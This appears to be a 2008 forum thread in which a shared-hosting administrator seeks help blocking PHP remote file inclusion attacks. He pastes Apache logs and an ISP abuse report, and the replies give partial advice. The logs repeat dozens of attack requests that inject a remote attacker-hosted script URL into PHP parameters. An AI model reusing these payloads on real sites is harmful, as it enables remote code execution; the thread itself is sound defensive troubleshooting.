Shamsul Kamal
asked on
Anybody know how to block this specific PHP Inject attack using Mod_Security2 in CPanel ?
Hi,
I would like to request an assistant.
Anybody know how to block the following "WEB-PHP remote include path" attack using mod_security.
I have tried using Default Mod_Securty and also Mod_security from http://www.timmit.nl/modsec2.user.conf.
But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server. Â
The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.
========================== =======
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:23:47 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:15 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:16 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:29:07 +0800] "GET //config.inc.php?path_esca pe=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid =2//login. php%3fskin _dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:27 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:28 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:54:25 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux/9131.html//login.ph p?skin_dir =http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux//login.php?skin_dir =http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac/9194.html//login.php? skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:19:10 +0800] "GET /?module=pnForum&func=view topic&topi c=813&=&ne wlang =deu//phpopenchat/contrib/ yabbse/poc .php%3fsou rcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:11 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:25 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:38 +0800] "GET ///modules/My_eGallery/pub lic/displa yCategory. php?basepa th=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:21:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:24:26 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:36 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:20 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:21 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:29 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:34 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:28:33 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:31:34 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:34:59 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:35:10 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:37:44 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:38:03 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&_RE QUEST%5bop tion%5d=co m_cont ent&_REQUEST%5bItemid%5d=1 &GLOBALS=& mosConfig_ abso lute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:02:42:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:49 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255bo ption%255d =com_conte nt&_R EQUEST%255bItemid%255d=1&G LOBALS=&mo sConfig_ab solu te_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?name=Sitemap//modules/My _eGallery/ public/dis playCatego ry.php%3fb asepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:08 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:09 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:11:16:49 +0800] "GET /kb/php_joomla//libraries/ joomla/app lication/r outer.php? path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /libraries/joomla/applicat ion/router .php?path= http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /kb//libraries/joomla/appl ication/ro uter.php?p ath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
========================== ==========
Appreciates if anybody can help to stop this attack. Â
Thank you,
Regards,
Sham
I would like to request an assistant.
Anybody know how to block the following "WEB-PHP remote include path" attack using mod_security.
I have tried using Default Mod_Securty and also Mod_security from http://www.timmit.nl/modsec2.user.conf.
But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server. Â
The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.
==========================
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:23:47 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:15 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:16 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:29:07 +0800] "GET //config.inc.php?path_esca
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:27 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:28 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:54:25 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux/9131.html//login.ph
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux//login.php?skin_dir
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac/9194.html//login.php?
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:19:10 +0800] "GET /?module=pnForum&func=view
127.0.0.1 - - [16/Jun/2008:02:19:11 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:25 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:38 +0800] "GET ///modules/My_eGallery/pub
127.0.0.1 - - [16/Jun/2008:02:21:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:24:26 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:36 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:20 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:21 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:29 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:34 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:28:33 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:31:34 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:34:59 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:35:10 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:37:44 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:38:03 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&_RE
124.217.243.21 - - [16/Jun/2008:02:42:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:49 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255bo
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?name=Sitemap//modules/My
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:08 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:09 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:11:16:49 +0800] "GET /kb/php_joomla//libraries/
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /libraries/joomla/applicat
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /kb//libraries/joomla/appl
==========================
Appreciates if anybody can help to stop this attack. Â
Thank you,
Regards,
Sham
SOLUTION
membership
Create a free account to see this answer
Signing up is free and takes 30 seconds. No credit card required.
You will still get those things in the log even if mod_security is install. The effect is that the attack won't stop, but nothing happens on your server. Every webserver is under attack from bots/scripts, ... and each attempt is typical logged in the log.
ASKER
Ehm ....
I think the attack is still happening on my server because i received today a report from my Datacenter that there are hack activity to other server from my server using this PHP Inject method...
Their email is as follows :
-----Original Message-----
From: soc@brasiltelecom.com.br [mailto:soc@brasiltelecom. com.br]
Sent: Monday, June 16, 2008 5:29 AM
Cc: cert@cert.br
Subject: Incident ID: BRT563785 Sent to abuse@piradius.net
Importance: High
Dear Sirs,
  It was detected on Brasil Telecom's monitoring systems that the
 machine listed in this mail has been maliciously used. The traffic details are
below (Note that the date/time is in the format: YYYY-MM-DD HH:MM:SS).
Please respond accordingly to this Incident.
  Therefore the IP 124.217.243.21 will be blocked on all our Data Centers for 60 minutes.
  To reply this e-mail, please keep the ID BRT563785 in the Subject Field.
Thanks,
CSIRT Brasil Telecom
2008-06-15 05:55:43 GMT
124.217.243.21 1:2002 WEB-PHP remote include path
Prezados responsaveis,
  Foi identificado atraves da monitoracao de seguranca da Brasil
Telecom que a maquina listada abaixo esta sendo usada para fins
maliciosos na Internet (Note que a data esta no seguinte formato:
AAAA-MM-DD HH:MM:SS). Favor tomar as acoes cabiveis em relacao ao
Incidente.
  Em virtude disso o IP 124.217.243.21 ficara 60 minutos bloqueado em todos os nossos Data centers.
  Ao responder este e-mail mantenha o ID BRT563785 no campo assunto.
Att,
Brasil Telecom CSIRT
Para maiores Informacoes sobre a(s) atividade(s) detectadas:
For more Informations about the activity visit:
http://www.snort.org/pub-bin/sigs.cgi?sid=1:2002
---
Esta mensagem foi enviada automaticamente pelo SOC - Centro de Operacoes de Seguranca da Brasil Telecom S.A. e pode conter informacoes privilegiadas e/ou de carater confidencial, nao podendo ser retransmitida. Caso mais esclarecimentos ou acoes por parte da equipe de Resposta a Incidentes de Seguranca sejam necessarios, favor contactar o SOC no telefone +55(61)3305-5565 (atendimento 24x7), ou pelo e-mail soc.nivel1@brasiltelecom.c om.br.
Really appreciates if anybody can help.
I think the attack is still happening on my server because i received today a report from my Datacenter that there are hack activity to other server from my server using this PHP Inject method...
Their email is as follows :
-----Original Message-----
From: soc@brasiltelecom.com.br [mailto:soc@brasiltelecom.
Sent: Monday, June 16, 2008 5:29 AM
Cc: cert@cert.br
Subject: Incident ID: BRT563785 Sent to abuse@piradius.net
Importance: High
Dear Sirs,
  It was detected on Brasil Telecom's monitoring systems that the
 machine listed in this mail has been maliciously used. The traffic details are
below (Note that the date/time is in the format: YYYY-MM-DD HH:MM:SS).
Please respond accordingly to this Incident.
  Therefore the IP 124.217.243.21 will be blocked on all our Data Centers for 60 minutes.
  To reply this e-mail, please keep the ID BRT563785 in the Subject Field.
Thanks,
CSIRT Brasil Telecom
2008-06-15 05:55:43 GMT
124.217.243.21 1:2002 WEB-PHP remote include path
Prezados responsaveis,
  Foi identificado atraves da monitoracao de seguranca da Brasil
Telecom que a maquina listada abaixo esta sendo usada para fins
maliciosos na Internet (Note que a data esta no seguinte formato:
AAAA-MM-DD HH:MM:SS). Favor tomar as acoes cabiveis em relacao ao
Incidente.
  Em virtude disso o IP 124.217.243.21 ficara 60 minutos bloqueado em todos os nossos Data centers.
  Ao responder este e-mail mantenha o ID BRT563785 no campo assunto.
Att,
Brasil Telecom CSIRT
Para maiores Informacoes sobre a(s) atividade(s) detectadas:
For more Informations about the activity visit:
http://www.snort.org/pub-bin/sigs.cgi?sid=1:2002
---
Esta mensagem foi enviada automaticamente pelo SOC - Centro de Operacoes de Seguranca da Brasil Telecom S.A. e pode conter informacoes privilegiadas e/ou de carater confidencial, nao podendo ser retransmitida. Caso mais esclarecimentos ou acoes por parte da equipe de Resposta a Incidentes de Seguranca sejam necessarios, favor contactar o SOC no telefone +55(61)3305-5565 (atendimento 24x7), ou pelo e-mail soc.nivel1@brasiltelecom.c
Really appreciates if anybody can help.
SOLUTION
membership
Create a free account to see this answer
Signing up is free and takes 30 seconds. No credit card required.
ASKER
Hi Fibo,
Thanks for the advice.
But this server is actually a shared hosting server using cpanel.
I cannot do it per script basis, those script might belong to our hosting client.
Thanks for the advice.
But this server is actually a shared hosting server using cpanel.
I cannot do it per script basis, those script might belong to our hosting client.
Using cpanel, you have access to the file directories, right?
- You can then check and clean the directories for unwanted "eggs" in your "nest"
- you can add "index.htm" or "index.php" in the directories where needed.
- You can change access right sto the directories
<<I cannot do it per script basis, those script might belong to our hosting client.>>
I presume you mean "hosting provider"
I presume you have installed scripts thru cpanel. The scripts (eg php) present on your site are now "your copy" and you may change them to your will (check that with your provider, of course) although you will get no support for your changes.
Changing php scripts need some php knowledge, but not to be a complete expert.
You might also ask for some (charged) assistance from your provider.
- You can then check and clean the directories for unwanted "eggs" in your "nest"
- you can add "index.htm" or "index.php" in the directories where needed.
- You can change access right sto the directories
<<I cannot do it per script basis, those script might belong to our hosting client.>>
I presume you mean "hosting provider"
I presume you have installed scripts thru cpanel. The scripts (eg php) present on your site are now "your copy" and you may change them to your will (check that with your provider, of course) although you will get no support for your changes.
Changing php scripts need some php knowledge, but not to be a complete expert.
You might also ask for some (charged) assistance from your provider.
ASKER
Hi Fibo,
Thanks for your advice again.
But, actually we are the hosting provider and we received the report as the attached email from my previous post saying that our shared hosting server has been used to maliciously hack other people server using PHP Inject Scripts.
I have around 300 domain hosted on the server.
The problems are :
1. I have no idea which scripts or domain that cause the error that make me think mod_security is the best way to block it.
2. I cannot alter my client php file or .htaccess without their knowlege and some more i dont even know which hosting account or scripts that has been used for the PHP inject activities.
Appreciates if you could advice based on that.
Thanks for your advice again.
But, actually we are the hosting provider and we received the report as the attached email from my previous post saying that our shared hosting server has been used to maliciously hack other people server using PHP Inject Scripts.
I have around 300 domain hosted on the server.
The problems are :
1. I have no idea which scripts or domain that cause the error that make me think mod_security is the best way to block it.
2. I cannot alter my client php file or .htaccess without their knowlege and some more i dont even know which hosting account or scripts that has been used for the PHP inject activities.
Appreciates if you could advice based on that.
OK. Sorry, I was completely in the wrong direction.
- Are you the piradius.net reported in the mail?
- Is the IP address 124.217.243.21 part of yours? are there specific host on this machine?
- if this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERTS' SITES...
Some random thoughts/ questions
- mod_security seems to be htaccess/mod rewrite based and I would think you cannot use them without your customers' consent and so should be ruled out as a general solution.
- what does your clients' contract say? who is responsible for their own account security?
- the logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack. (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their won site).
- are their site hosted physically on the same machine as yours? are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).
- I presume you are taking backup of everything, including their sites. If not, you should  until things sem fairly back to normal: it will ensure that, in case of a major problem, the diruption will be as short as possible.
- Are you the piradius.net reported in the mail?
- Is the IP address 124.217.243.21 part of yours? are there specific host on this machine?
- if this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERTS' SITES...
Some random thoughts/ questions
- mod_security seems to be htaccess/mod rewrite based and I would think you cannot use them without your customers' consent and so should be ruled out as a general solution.
- what does your clients' contract say? who is responsible for their own account security?
- the logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack. (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their won site).
- are their site hosted physically on the same machine as yours? are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).
- I presume you are taking backup of everything, including their sites. If not, you should  until things sem fairly back to normal: it will ensure that, in case of a major problem, the diruption will be as short as possible.
ASKER
Hi,
Thanks for the advice and your comment.
Refer to your question :
- Are you the piradius.net reported in the mail?
>>Â No, piradius.net is our IP provider.
- Is the IP address 124.217.243.21 part of yours? are there specific host on this machine?
>>Â Yes, 124.217.243.21 is the main shared IP for this server.
- if this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERTS' SITES...
